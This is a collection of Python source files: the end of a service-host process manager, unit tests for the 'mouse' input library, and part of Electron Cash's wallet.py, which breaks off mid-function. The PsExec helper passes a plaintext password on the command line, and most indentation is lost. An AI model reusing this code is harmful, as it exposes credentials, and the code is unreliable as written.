traceback.print_exception(exc_type, exc_value, exc_traceback)
return False
""" Returns a process object for when one is neeeded """
def RunCommandEx(self, cwd, cmd, cmdargs):
try:
cmdline = "{0} {1}".format(cmd, cmdargs)
p = psutil.Popen(cmdline, close_fds=True, cwd=cwd, creationflags=subprocess.CREATE_NEW_CONSOLE)
return p
except Exception:
return None
def RunCommand(self, cwd, cmd, cmdargs):
self.RunCommandEx(cwd, cmd, cmdargs)
""" Use PsExec to run the command """
def RunCommandAsEx(self, username, password, cwd, cmd, cmdargs):
try:
            cmdline = "PsExec -u {0} -p {1} {2} {3} {4}".format(username, password, cwd, cmd, cmdargs)
p = psutil.Popen(cmdline, close_fds=True, cwd=cwd, creationflags=subprocess.CREATE_NEW_CONSOLE)
return p
except Exception:
return None
def RunCommandAs(self, username, password, cwd, cmd, cmdargs):
self.RunCommandAsEx(username, password, cwd, cmd, cmdargs)
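# --- Hedged sketch (illustration only; not used by RegionHost) ---------------
# The monitor/queue pattern implemented above, in miniature: one daemon thread
# notices services that should be running but are not and enqueues them, while
# a single worker restarts them one at a time so start-ups never overlap.
# 'services' is assumed to be objects exposing ShouldBeRunning/IsRunning/Start.
def _watchdog_sketch(services, poll_interval=10.0):
    work = Queue.Queue()
    def monitor():
        while True:
            for svc in services:
                if svc.ShouldBeRunning() and not svc.IsRunning():
                    work.put(svc)
            time.sleep(poll_interval)
    def runner():
        while True:
            svc = work.get()
            try:
                svc.Start()
                time.sleep(2)  # stagger start-ups, as _processQueue does
            finally:
                work.task_done()
    for target in (monitor, runner):
        t = threading.Thread(target=target)
        t.setDaemon(True)
        t.start()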
|
_mouse_tests.py
|
# -*- coding: utf-8 -*-
import unittest
import time
from ._mouse_event import MoveEvent, ButtonEvent, WheelEvent, LEFT, RIGHT, MIDDLE, X, X2, UP, DOWN, DOUBLE
import mouse
class FakeOsMouse(object):
def __init__(self):
self.append = None
self.position = (0, 0)
self.queue = None
self.init = lambda: None
def listen(self, queue):
self.listening = True
self.queue = queue
def press(self, button):
self.append((DOWN, button))
def release(self, button):
self.append((UP, button))
def get_position(self):
return self.position
def move_to(self, x, y):
self.append(('move', (x, y)))
self.position = (x, y)
def wheel(self, delta):
self.append(('wheel', delta))
def move_relative(self, x, y):
self.position = (self.position[0] + x, self.position[1] + y)
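# The tests below swap the real OS backend for FakeOsMouse: setUpClass installs
# it as mouse._os_mouse, FakeOsMouse.listen captures the listener queue so that
# synthetic MoveEvent/ButtonEvent/WheelEvent objects can be injected, and every
# command the library issues is recorded through self.events.append instead of
# touching the real cursor.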
class TestMouse(unittest.TestCase):
@staticmethod
def setUpClass():
        mouse._os_mouse = FakeOsMouse()
mouse._listener.start_if_necessary()
assert mouse._os_mouse.listening
def setUp(self):
self.events = []
mouse._pressed_events.clear()
mouse._os_mouse.append = self.events.append
def tearDown(self):
mouse.unhook_all()
# Make sure there's no spill over between tests.
self.wait_for_events_queue()
def wait_for_events_queue(self):
mouse._listener.queue.join()
def flush_events(self):
self.wait_for_events_queue()
events = list(self.events)
        # Ugly, but required to work in Python2. Python3 has list.clear
del self.events[:]
return events
def press(self, button=LEFT):
mouse._os_mouse.queue.put(ButtonEvent(DOWN, button, time.time()))
self.wait_for_events_queue()
def release(self, button=LEFT):
mouse._os_mouse.queue.put(ButtonEvent(UP, button, time.time()))
self.wait_for_events_queue()
def double_click(self, button=LEFT):
mouse._os_mouse.queue.put(ButtonEvent(DOUBLE, button, time.time()))
self.wait_for_events_queue()
def click(self, button=LEFT):
self.press(button)
self.release(button)
def wheel(self, delta=1):
mouse._os_mouse.queue.put(WheelEvent(delta, time.time()))
self.wait_for_events_queue()
def move(self, x=0, y=0):
mouse._os_mouse.queue.put(MoveEvent(x, y, time.time()))
self.wait_for_events_queue()
def test_hook(self):
events = []
self.press()
mouse.hook(events.append)
self.press()
mouse.unhook(events.append)
self.press()
self.assertEqual(len(events), 1)
def test_is_pressed(self):
self.assertFalse(mouse.is_pressed())
self.press()
self.assertTrue(mouse.is_pressed())
self.release()
self.press(X2)
self.assertFalse(mouse.is_pressed())
self.assertTrue(mouse.is_pressed(X2))
self.press(X2)
self.assertTrue(mouse.is_pressed(X2))
self.release(X2)
self.release(X2)
self.assertFalse(mouse.is_pressed(X2))
def test_buttons(self):
mouse.press()
self.assertEqual(self.flush_events(), [(DOWN, LEFT)])
mouse.release()
self.assertEqual(self.flush_events(), [(UP, LEFT)])
mouse.click()
self.assertEqual(self.flush_events(), [(DOWN, LEFT), (UP, LEFT)])
mouse.double_click()
self.assertEqual(self.flush_events(), [(DOWN, LEFT), (UP, LEFT), (DOWN, LEFT), (UP, LEFT)])
mouse.right_click()
self.assertEqual(self.flush_events(), [(DOWN, RIGHT), (UP, RIGHT)])
mouse.click(RIGHT)
self.assertEqual(self.flush_events(), [(DOWN, RIGHT), (UP, RIGHT)])
mouse.press(X2)
self.assertEqual(self.flush_events(), [(DOWN, X2)])
def test_position(self):
self.assertEqual(mouse.get_position(), mouse._os_mouse.get_position())
def test_move(self):
mouse.move(0, 0)
self.assertEqual(mouse._os_mouse.get_position(), (0, 0))
mouse.move(100, 500)
self.assertEqual(mouse._os_mouse.get_position(), (100, 500))
mouse.move(1, 2, False)
self.assertEqual(mouse._os_mouse.get_position(), (101, 502))
mouse.move(0, 0)
mouse.move(100, 499, True, duration=0.01)
self.assertEqual(mouse._os_mouse.get_position(), (100, 499))
mouse.move(100, 1, False, duration=0.01)
self.assertEqual(mouse._os_mouse.get_position(), (200, 500))
mouse.move(0, 0, False, duration=0.01)
self.assertEqual(mouse._os_mouse.get_position(), (200, 500))
def triggers(self, fn, events, **kwargs):
self.triggered = False
def callback():
self.triggered = True
handler = fn(callback, **kwargs)
for event_type, arg in events:
if event_type == DOWN:
self.press(arg)
elif event_type == UP:
self.release(arg)
elif event_type == DOUBLE:
self.double_click(arg)
elif event_type == 'WHEEL':
self.wheel()
mouse._listener.remove_handler(handler)
return self.triggered
def test_on_button(self):
self.assertTrue(self.triggers(mouse.on_button, [(DOWN, LEFT)]))
self.assertTrue(self.triggers(mouse.on_button, [(DOWN, RIGHT)]))
self.assertTrue(self.triggers(mouse.on_button, [(DOWN, X)]))
self.assertFalse(self.triggers(mouse.on_button, [('WHEEL', '')]))
self.assertFalse(self.triggers(mouse.on_button, [(DOWN, X)], buttons=MIDDLE))
self.assertTrue(self.triggers(mouse.on_button, [(DOWN, MIDDLE)], buttons=MIDDLE))
self.assertTrue(self.triggers(mouse.on_button, [(DOWN, MIDDLE)], buttons=MIDDLE))
self.assertFalse(self.triggers(mouse.on_button, [(DOWN, MIDDLE)], buttons=MIDDLE, types=UP))
self.assertTrue(self.triggers(mouse.on_button, [(UP, MIDDLE)], buttons=MIDDLE, types=UP))
self.assertTrue(self.triggers(mouse.on_button, [(UP, MIDDLE)], buttons=[MIDDLE, LEFT], types=[UP, DOWN]))
self.assertTrue(self.triggers(mouse.on_button, [(DOWN, LEFT)], buttons=[MIDDLE, LEFT], types=[UP, DOWN]))
self.assertFalse(self.triggers(mouse.on_button, [(UP, X)], buttons=[MIDDLE, LEFT], types=[UP, DOWN]))
def test_ons(self):
self.assertTrue(self.triggers(mouse.on_click, [(UP, LEFT)]))
self.assertFalse(self.triggers(mouse.on_click, [(UP, RIGHT)]))
self.assertFalse(self.triggers(mouse.on_click, [(DOWN, LEFT)]))
self.assertFalse(self.triggers(mouse.on_click, [(DOWN, RIGHT)]))
self.assertTrue(self.triggers(mouse.on_double_click, [(DOUBLE, LEFT)]))
self.assertFalse(self.triggers(mouse.on_double_click, [(DOUBLE, RIGHT)]))
self.assertFalse(self.triggers(mouse.on_double_click, [(DOWN, RIGHT)]))
self.assertTrue(self.triggers(mouse.on_right_click, [(UP, RIGHT)]))
self.assertTrue(self.triggers(mouse.on_middle_click, [(UP, MIDDLE)]))
def test_wait(self):
        # If this fails it blocks. Unfortunate, but I see no other way of testing.
from threading import Thread, Lock
lock = Lock()
lock.acquire()
def t():
mouse.wait()
lock.release()
Thread(target=t).start()
self.press()
lock.acquire()
def test_record_play(self):
from threading import Thread, Lock
lock = Lock()
lock.acquire()
def t():
self.recorded = mouse.record(RIGHT)
lock.release()
Thread(target=t).start()
self.click()
self.wheel(5)
self.move(100, 50)
self.press(RIGHT)
lock.acquire()
self.assertEqual(len(self.recorded), 5)
self.assertEqual(self.recorded[0]._replace(time=None), ButtonEvent(DOWN, LEFT, None))
self.assertEqual(self.recorded[1]._replace(time=None), ButtonEvent(UP, LEFT, None))
self.assertEqual(self.recorded[2]._replace(time=None), WheelEvent(5, None))
self.assertEqual(self.recorded[3]._replace(time=None), MoveEvent(100, 50, None))
self.assertEqual(self.recorded[4]._replace(time=None), ButtonEvent(DOWN, RIGHT, None))
mouse.play(self.recorded, speed_factor=0)
events = self.flush_events()
self.assertEqual(len(events), 5)
self.assertEqual(events[0], (DOWN, LEFT))
self.assertEqual(events[1], (UP, LEFT))
self.assertEqual(events[2], ('wheel', 5))
self.assertEqual(events[3], ('move', (100, 50)))
self.assertEqual(events[4], (DOWN, RIGHT))
mouse.play(self.recorded)
events = self.flush_events()
self.assertEqual(len(events), 5)
self.assertEqual(events[0], (DOWN, LEFT))
self.assertEqual(events[1], (UP, LEFT))
self.assertEqual(events[2], ('wheel', 5))
self.assertEqual(events[3], ('move', (100, 50)))
self.assertEqual(events[4], (DOWN, RIGHT))
mouse.play(self.recorded, include_clicks=False)
events = self.flush_events()
self.assertEqual(len(events), 2)
self.assertEqual(events[0], ('wheel', 5))
self.assertEqual(events[1], ('move', (100, 50)))
mouse.play(self.recorded, include_moves=False)
events = self.flush_events()
self.assertEqual(len(events), 4)
self.assertEqual(events[0], (DOWN, LEFT))
self.assertEqual(events[1], (UP, LEFT))
self.assertEqual(events[2], ('wheel', 5))
self.assertEqual(events[3], (DOWN, RIGHT))
mouse.play(self.recorded, include_wheel=False)
events = self.flush_events()
self.assertEqual(len(events), 4)
self.assertEqual(events[0], (DOWN, LEFT))
self.assertEqual(events[1], (UP, LEFT))
self.assertEqual(events[2], ('move', (100, 50)))
self.assertEqual(events[3], (DOWN, RIGHT))
if __name__ == '__main__':
unittest.main()
|
wallet.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Wallet classes:
# - ImportedAddressWallet: imported address, no keystore
# - ImportedPrivkeyWallet: imported private keys, keystore
# - Standard_Wallet: one keystore, P2PKH
# - Multisig_Wallet: several keystores, P2SH
import copy
import errno
import json
import itertools
import os
import queue
import random
import threading
import time
from collections import defaultdict, namedtuple
from enum import Enum, auto
from functools import partial
from typing import Set, Tuple, Union
from .i18n import ngettext
from .util import (NotEnoughFunds, ExcessiveFee, PrintError, UserCancelled, profiler, format_satoshis, format_time,
finalization_print_error, to_string, TimeoutException)
from .address import Address, Script, ScriptOutput, PublicKey, OpCodes
from .bitcoin import *
from .version import *
from .keystore import load_keystore, Hardware_KeyStore, Imported_KeyStore, BIP32_KeyStore, xpubkey_to_address
from . import networks
from . import keystore
from .storage import multisig_type, WalletStorage
from . import transaction
from .transaction import Transaction, InputValueMissing
from .plugins import run_hook
from . import bitcoin
from . import coinchooser
from .synchronizer import Synchronizer
from .verifier import SPV, SPVDelegate
from . import schnorr
from . import ecc_fast
from .blockchain import NULL_HASH_HEX
from . import paymentrequest
from .paymentrequest import InvoiceStore, PR_PAID, PR_UNPAID, PR_UNKNOWN, PR_EXPIRED
from .contacts import Contacts
from . import cashacct
from . import slp
def _(message): return message
TX_STATUS = [
_('Unconfirmed parent'),
_('Low fee'),
_('Unconfirmed'),
_('Not Verified'),
]
del _
from .i18n import _
DEFAULT_CONFIRMED_ONLY = False
def relayfee(network):
RELAY_FEE = 5000
MAX_RELAY_FEE = 50000
f = network.relay_fee if network and network.relay_fee else RELAY_FEE
return min(f, MAX_RELAY_FEE)
def dust_threshold(network):
# Change < dust threshold is added to the tx fee
#return 182 * 3 * relayfee(network) / 1000 # original Electrum logic
#return 1 # <-- was this value until late Sept. 2018
return 546 # hard-coded Bitcoin Cash dust threshold. Was changed to this as of Sept. 2018
def sweep_preparations(privkeys, network, imax=100):
class InputsMaxxed(Exception):
pass
def append_utxos_to_inputs(inputs, pubkey, txin_type):
if txin_type == 'p2pkh':
address = Address.from_pubkey(pubkey)
else:
address = PublicKey.from_pubkey(pubkey)
sh = address.to_scripthash_hex()
u = network.synchronous_get(('blockchain.scripthash.listunspent', [sh]))
for item in u:
if len(inputs) >= imax:
raise InputsMaxxed()
item['address'] = address
item['type'] = txin_type
item['prevout_hash'] = item['tx_hash']
item['prevout_n'] = item['tx_pos']
item['pubkeys'] = [pubkey]
item['x_pubkeys'] = [pubkey]
item['signatures'] = [None]
item['num_sig'] = 1
inputs.append(item)
def find_utxos_for_privkey(txin_type, privkey, compressed):
pubkey = bitcoin.public_key_from_private_key(privkey, compressed)
append_utxos_to_inputs(inputs, pubkey, txin_type)
keypairs[pubkey] = privkey, compressed
inputs = []
keypairs = {}
try:
for sec in privkeys:
txin_type, privkey, compressed = bitcoin.deserialize_privkey(sec)
find_utxos_for_privkey(txin_type, privkey, compressed)
# do other lookups to increase support coverage
if is_minikey(sec):
# minikeys don't have a compressed byte
# we lookup both compressed and uncompressed pubkeys
find_utxos_for_privkey(txin_type, privkey, not compressed)
elif txin_type == 'p2pkh':
# WIF serialization does not distinguish p2pkh and p2pk
# we also search for pay-to-pubkey outputs
find_utxos_for_privkey('p2pk', privkey, compressed)
elif txin_type == 'p2sh':
raise ValueError(_("The specified WIF key '{}' is a p2sh WIF key. These key types cannot be swept.").format(sec))
except InputsMaxxed:
pass
if not inputs:
raise ValueError(_('No inputs found. (Note that inputs need to be confirmed)'))
return inputs, keypairs
def sweep(privkeys, network, config, recipient, fee=None, imax=100, sign_schnorr=False):
inputs, keypairs = sweep_preparations(privkeys, network, imax)
total = sum(i.get('value') for i in inputs)
if fee is None:
outputs = [(TYPE_ADDRESS, recipient, total)]
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = config.estimate_fee(tx.estimated_size())
if total - fee < 0:
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d'%(total, fee))
if total - fee < dust_threshold(network):
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d\nDust Threshold: %d'%(total, fee, dust_threshold(network)))
outputs = [(TYPE_ADDRESS, recipient, total - fee)]
locktime = network.get_local_height()
tx = Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
tx.BIP_LI01_sort()
tx.sign(keypairs)
return tx
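# Worked example (illustrative figures only): sweeping inputs worth 20,000 sats
# with an estimated fee of 1,000 sats yields a single 19,000-sat output to the
# recipient; if total - fee were negative or fell below dust_threshold()
# (546 sats), sweep() would raise NotEnoughFunds instead of building the tx.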
class Abstract_Wallet(PrintError, SPVDelegate):
"""
Wallet classes are created to handle various address generation methods.
Completion states (watching-only, single account, no seed, etc) are handled inside classes.
"""
max_change_outputs = 3
def __init__(self, storage):
self.electrum_version = PACKAGE_VERSION
self.storage = storage
self.thread = None # this is used by the qt main_window to store a QThread. We just make sure it's always defined as an attribute here.
self.network = None
# verifier (SPV) and synchronizer are started in start_threads
self.synchronizer = None
self.verifier = None
self.weak_window = None # Some of the GUI classes, such as the Qt ElectrumWindow, use this to refer back to themselves. This should always be a weakref.ref (Weak.ref), or None
# CashAccounts subsystem. Its network-dependent layer is started in
# start_threads. Note: object instantiation should be lightweight here.
# self.cashacct.load() is called later in this function to load data.
self.cashacct = cashacct.CashAcct(self)
self.slp = slp.WalletData(self)
finalization_print_error(self.cashacct) # debug object lifecycle
finalization_print_error(self.slp) # debug object lifecycle
# Removes defunct entries from self.pruned_txo asynchronously
self.pruned_txo_cleaner_thread = None
# Cache of Address -> (c,u,x) balance. This cache is used by
# get_addr_balance to significantly speed it up (it is called a lot).
# Cache entries are invalidated when tx's are seen involving this
        # address (address history changes). Entries to this cache are added
# only inside get_addr_balance.
# Note that this data structure is touched by the network and GUI
# thread concurrently without the use of locks, because Python GIL
# allows us to get away with such things. As such do not iterate over
# this dict, but simply add/remove items to/from it in 1-liners (which
# Python's GIL makes thread-safe implicitly).
self._addr_bal_cache = {}
# We keep frozensets of the change and receiving addresses so that
# is_mine() checks are O(1) rather than O(N). This creates/resets those caches.
self.invalidate_address_set_cache()
self.gap_limit_for_change = 20 # constant
# saved fields
self.use_change = storage.get('use_change', True)
self.multiple_change = storage.get('multiple_change', False)
self.labels = storage.get('labels', {})
# Frozen addresses
frozen_addresses = storage.get('frozen_addresses',[])
self.frozen_addresses = set(Address.from_string(addr)
for addr in frozen_addresses)
# Frozen coins (UTXOs) -- note that we have 2 independent levels of "freezing": address-level and coin-level.
# The two types of freezing are flagged independently of each other, and a coin is
# considered spendable only if it is not frozen at either level.
self.frozen_coins = set(storage.get('frozen_coins', []))
self.frozen_coins_tmp = set() # in-memory only
self.change_reserved = set(Address.from_string(a) for a in storage.get('change_reserved', ()))
self.change_reserved_default = [Address.from_string(a) for a in storage.get('change_reserved_default', ())]
self.change_unreserved = [Address.from_string(a) for a in storage.get('change_unreserved', ())]
self.change_reserved_tmp = set() # in-memory only
# address -> list(txid, height)
history = storage.get('addr_history',{})
self._history = self.to_Address_dict(history)
# there is a difference between wallet.up_to_date and interface.is_up_to_date()
# interface.is_up_to_date() returns true when all requests have been answered and processed
# wallet.up_to_date is true when the wallet is synchronized (stronger requirement)
self.up_to_date = False
# The only lock. We used to have two here. That was more technical debt
# without much purpose. 1 lock is sufficient. In particular data
# structures that are touched by the network thread as well as the GUI
# (such as self.transactions, history, etc) need to be synchronized
# using this mutex.
self.lock = threading.RLock()
# load requests
requests = self.storage.get('payment_requests', {})
for key, req in requests.items():
req['address'] = Address.from_string(key)
self.receive_requests = {req['address']: req
for req in requests.values()}
# Transactions pending verification. A map from tx hash to transaction
# height. Access is contended so a lock is needed. Client code should
# use get_unverified_tx to get a thread-safe copy of this dict.
self.unverified_tx = defaultdict(int)
# Verified transactions. Each value is a (height, timestamp, block_pos) tuple. Access with self.lock.
self.verified_tx = storage.get('verified_tx3', {})
# save wallet type the first time
if self.storage.get('wallet_type') is None:
self.storage.put('wallet_type', self.wallet_type)
# invoices and contacts
self.invoices = InvoiceStore(self.storage)
self.contacts = Contacts(self.storage)
# cashacct is started in start_threads, but it needs to have relevant
# data here, before the below calls happen
self.cashacct.load()
self.slp.load() # try to load first so we can pick up the remove_transaction hook from load_transactions if need be
# Now, finally, after object is constructed -- we can do this
self.load_keystore_wrapper()
self.load_addresses()
self.load_transactions()
self.build_reverse_history()
self.check_history()
if self.slp.need_rebuild:
# load failed, must rebuild from self.transactions
self.slp.rebuild()
self.slp.save() # commit changes to self.storage
# Print debug message on finalization
finalization_print_error(self, "[{}/{}] finalized".format(type(self).__name__, self.diagnostic_name()))
@classmethod
def to_Address_dict(cls, d):
'''Convert a dict of strings to a dict of Address objects.'''
return {Address.from_string(text): value for text, value in d.items()}
@classmethod
def from_Address_dict(cls, d):
'''Convert a dict of Address objects to a dict of strings.'''
return {addr.to_storage_string(): value
for addr, value in d.items()}
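# Round-trip sketch for the two classmethods above (the address string is a
# made-up placeholder):
#
#   storage_form = {'bitcoincash:qq...': [['txid', 0]]}
#   addr_form = Abstract_Wallet.to_Address_dict(storage_form)   # str keys -> Address keys
#   back = Abstract_Wallet.from_Address_dict(addr_form)         # Address keys -> storage strings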
def diagnostic_name(self):
return self.basename()
def __str__(self):
return self.basename()
def get_master_public_key(self):
return None
def load_keystore_wrapper(self):
""" Loads the keystore, but also tries to preserve derivation(s). Older
Electron Cash versions would not save the derivation for all keystore
types. So this function ensures:
1. That on first run, we store the keystore_derivations to top-level
storage (which is preserved always).
2. On subsequent runs we try and load the keystore_derivations from
storage and restore them if the individual keystore.derivation data
items were lost (because user loaded wallet with older Electron
Cash).
This function is provided to allow users to switch between old and new
EC versions. In the future if we deprecate the wallet format, or if
enough time has passed, this function may be removed and the simple
self.load_keystore() may be used instead. """
self.load_keystore()
if not hasattr(self, 'get_keystores'):
return
from .keystore import Deterministic_KeyStore, Old_KeyStore
keystores = self.get_keystores()
keystore_derivations = self.storage.get('keystore_derivations', [])
if len(keystore_derivations) != len(keystores):
keystore_derivations = [None] * len(keystores)
updated, updated_ks, updated_st = False, False, False
for i, keystore in enumerate(keystores):
if i == 0 and isinstance(keystore, Deterministic_KeyStore) and not keystore.seed_type:
# Attempt to update keystore.seed_type
if isinstance(keystore, Old_KeyStore):
keystore.seed_type = 'old'
updated_st = True
else:
# attempt to restore the seed_type based on wallet saved "seed_type"
typ = self.storage.get('seed_type')
if typ in ('standard', 'electrum'):
keystore.seed_type = 'electrum'
updated_st = True
elif typ == 'bip39':
keystore.seed_type = 'bip39'
updated_st = True
saved_der = keystore_derivations[i]
der = (keystore.has_derivation() and keystore.derivation) or None
if der != saved_der:
if der:
# keystore had a derivation, but top-level storage did not
# (this branch is typically taken on first run after
# restoring from seed or creating a new wallet)
keystore_derivations[i] = saved_der = der
updated = True
elif saved_der:
# we had a derivation but keystore did not. This branch is
# taken if the user has loaded this wallet with an older
# version of Electron Cash. Attempt to restore their
# derivation item in keystore.
keystore.derivation = saved_der # write to keystore
updated_ks = True # tell it to re-save
if updated:
self.print_error("Updated keystore_derivations")
self.storage.put('keystore_derivations', keystore_derivations)
if updated_ks or updated_st:
if updated_ks:
self.print_error("Updated keystore (lost derivations restored)")
if updated_st:
self.print_error("Updated keystore (lost seed_type restored)")
self.save_keystore()
if any((updated, updated_ks, updated_st)):
self.storage.write()
@profiler
def load_transactions(self):
txi = self.storage.get('txi', {})
self.txi = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txi.items()
# skip empty entries to save memory and disk space
if value}
txo = self.storage.get('txo', {})
self.txo = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txo.items()
# skip empty entries to save memory and disk space
if value}
self.tx_fees = self.storage.get('tx_fees', {})
self.pruned_txo = self.storage.get('pruned_txo', {})
self.pruned_txo_values = set(self.pruned_txo.values())
tx_list = self.storage.get('transactions', {})
self.transactions = {}
for tx_hash, raw in tx_list.items():
tx = Transaction(raw)
self.transactions[tx_hash] = tx
if not self.txi.get(tx_hash) and not self.txo.get(tx_hash) and (tx_hash not in self.pruned_txo_values):
self.print_error("removing unreferenced tx", tx_hash)
self.transactions.pop(tx_hash)
self.cashacct.remove_transaction_hook(tx_hash)
self.slp.rm_tx(tx_hash)
@profiler
def save_transactions(self, write=False):
with self.lock:
tx = {}
for k,v in self.transactions.items():
tx[k] = str(v)
self.storage.put('transactions', tx)
txi = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txi.items()
# skip empty entries to save memory and disk space
if value}
txo = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txo.items()
# skip empty entries to save memory and disk space
if value}
self.storage.put('txi', txi)
self.storage.put('txo', txo)
self.storage.put('tx_fees', self.tx_fees)
self.storage.put('pruned_txo', self.pruned_txo)
history = self.from_Address_dict(self._history)
self.storage.put('addr_history', history)
self.slp.save()
if write:
self.storage.write()
def save_verified_tx(self, write=False):
with self.lock:
self.storage.put('verified_tx3', self.verified_tx)
self.cashacct.save()
if write:
self.storage.write()
def save_change_reservations(self):
with self.lock:
self.storage.put('change_reserved_default', [a.to_storage_string() for a in self.change_reserved_default])
self.storage.put('change_reserved', [a.to_storage_string() for a in self.change_reserved])
unreserved = self.change_unreserved + list(self.change_reserved_tmp)
self.storage.put('change_unreserved', [a.to_storage_string() for a in unreserved])
def clear_history(self):
with self.lock:
self.txi = {}
self.txo = {}
self.tx_fees = {}
self.pruned_txo = {}
self.pruned_txo_values = set()
self.slp.clear()
self.save_transactions()
self._addr_bal_cache = {}
self._history = {}
self.tx_addr_hist = defaultdict(set)
self.cashacct.on_clear_history()
@profiler
def build_reverse_history(self):
self.tx_addr_hist = defaultdict(set)
for addr, hist in self._history.items():
for tx_hash, h in hist:
self.tx_addr_hist[tx_hash].add(addr)
@profiler
def check_history(self):
save = False
my_addrs = [addr for addr in self._history if self.is_mine(addr)]
for addr in set(self._history) - set(my_addrs):
self._history.pop(addr)
save = True
for addr in my_addrs:
hist = self._history[addr]
for tx_hash, tx_height in hist:
if tx_hash in self.pruned_txo_values or self.txi.get(tx_hash) or self.txo.get(tx_hash):
continue
tx = self.transactions.get(tx_hash)
if tx is not None:
self.add_transaction(tx_hash, tx)
save = True
if save:
self.save_transactions()
self.cashacct.save()
def basename(self):
return os.path.basename(self.storage.path)
def save_addresses(self):
addr_dict = {
'receiving': [addr.to_storage_string()
for addr in self.receiving_addresses],
'change': [addr.to_storage_string()
for addr in self.change_addresses],
}
self.storage.put('addresses', addr_dict)
def load_addresses(self):
d = self.storage.get('addresses', {})
if not isinstance(d, dict):
d = {}
self.receiving_addresses = Address.from_strings(d.get('receiving', []))
self.change_addresses = Address.from_strings(d.get('change', []))
def synchronize(self):
pass
def is_deterministic(self):
return self.keystore.is_deterministic()
def set_up_to_date(self, up_to_date):
with self.lock:
self.up_to_date = up_to_date
if up_to_date:
self.save_addresses()
self.save_transactions()
# if the verifier is also up to date, persist that too;
# otherwise it will persist its results when it finishes
if self.verifier and self.verifier.is_up_to_date():
self.save_verified_tx()
self.storage.write()
def is_up_to_date(self):
with self.lock: return self.up_to_date
def is_fully_settled_down(self):
''' Returns True iff the wallet is up to date and its synchronizer
and verifier aren't busy doing work, and its pruned_txo_values set
is currently empty. This is used as a final check by the Qt GUI
to decide if it should do a final refresh of all tabs in some cases.'''
with self.lock:
ret = self.up_to_date
if ret and self.verifier:
ret = self.verifier.is_up_to_date()
if ret and self.synchronizer:
ret = self.synchronizer.is_up_to_date()
ret = ret and not self.pruned_txo_values
return bool(ret)
def set_label(self, name, text=None, save=True):
with self.lock:
if isinstance(name, Address):
name = name.to_storage_string()
changed = False
old_text = self.labels.get(name)
if text:
text = text.replace("\n", " ")
if old_text != text:
self.labels[name] = text
changed = True
else:
if old_text:
self.labels.pop(name)
changed = True
if changed:
run_hook('set_label', self, name, text)
if save:
self.save_labels()
return changed
def save_labels(self):
self.storage.put('labels', self.labels)
def invalidate_address_set_cache(self):
"""This should be called from functions that add/remove addresses
from the wallet to ensure the address set caches are empty, in
particular from ImportedWallets which may add/delete addresses,
in which case the length check in is_mine() may not be accurate.
Deterministic wallets can neglect to call this function since their
address sets only grow and never shrink and thus the length check
of is_mine below is sufficient."""
self._recv_address_set_cached, self._change_address_set_cached = frozenset(), frozenset()
def is_mine(self, address):
"""Note this method assumes that the entire address set is
composed of self.get_change_addresses() + self.get_receiving_addresses().
In subclasses, if that is not the case -- REIMPLEMENT this method!"""
assert not isinstance(address, str)
# assumption here is get_receiving_addresses and get_change_addresses
# are cheap constant-time operations returning a list reference.
# If that is not the case -- reimplement this function.
ra, ca = self.get_receiving_addresses(), self.get_change_addresses()
# Detect if sets changed (addresses added/removed).
# Note the functions that add/remove addresses should invalidate this
# cache using invalidate_address_set_cache() above.
if len(ra) != len(self._recv_address_set_cached):
# re-create cache if lengths don't match
self._recv_address_set_cached = frozenset(ra)
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
# Do two O(1) set membership checks rather than two O(N) list lookups
# (which was the previous approach). For small wallets it doesn't matter --
# but for wallets with 5k or 10k addresses it starts to add up, since
# is_mine() is called frequently, especially while downloading address
# history.
return (address in self._recv_address_set_cached
or address in self._change_address_set_cached)
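# Cache-maintenance sketch assumed by is_mine()/is_change(): any code that
# adds or removes wallet addresses (e.g. an imported-address wallet) should
# reset the frozensets, roughly (hypothetical mutation shown):
#
#   self.receiving_addresses.append(new_addr)
#   self.invalidate_address_set_cache()   # so is_mine() rebuilds its frozensets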
def is_change(self, address):
assert not isinstance(address, str)
ca = self.get_change_addresses()
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
return address in self._change_address_set_cached
def get_address_index(self, address):
try:
return False, self.receiving_addresses.index(address)
except ValueError:
pass
try:
return True, self.change_addresses.index(address)
except ValueError:
pass
assert not isinstance(address, str)
raise Exception("Address {} not found".format(address))
def export_private_key(self, address, password):
""" extended WIF format """
if self.is_watching_only():
return []
index = self.get_address_index(address)
pk, compressed = self.keystore.get_private_key(index, password)
return bitcoin.serialize_privkey(pk, compressed, self.txin_type)
def get_public_keys(self, address):
sequence = self.get_address_index(address)
return self.get_pubkeys(*sequence)
def add_unverified_tx(self, tx_hash, tx_height):
with self.lock:
if tx_height == 0 and tx_hash in self.verified_tx:
self.verified_tx.pop(tx_hash)
if self.verifier:
self.verifier.merkle_roots.pop(tx_hash, None)
# tx will be verified only if height > 0
if tx_hash not in self.verified_tx:
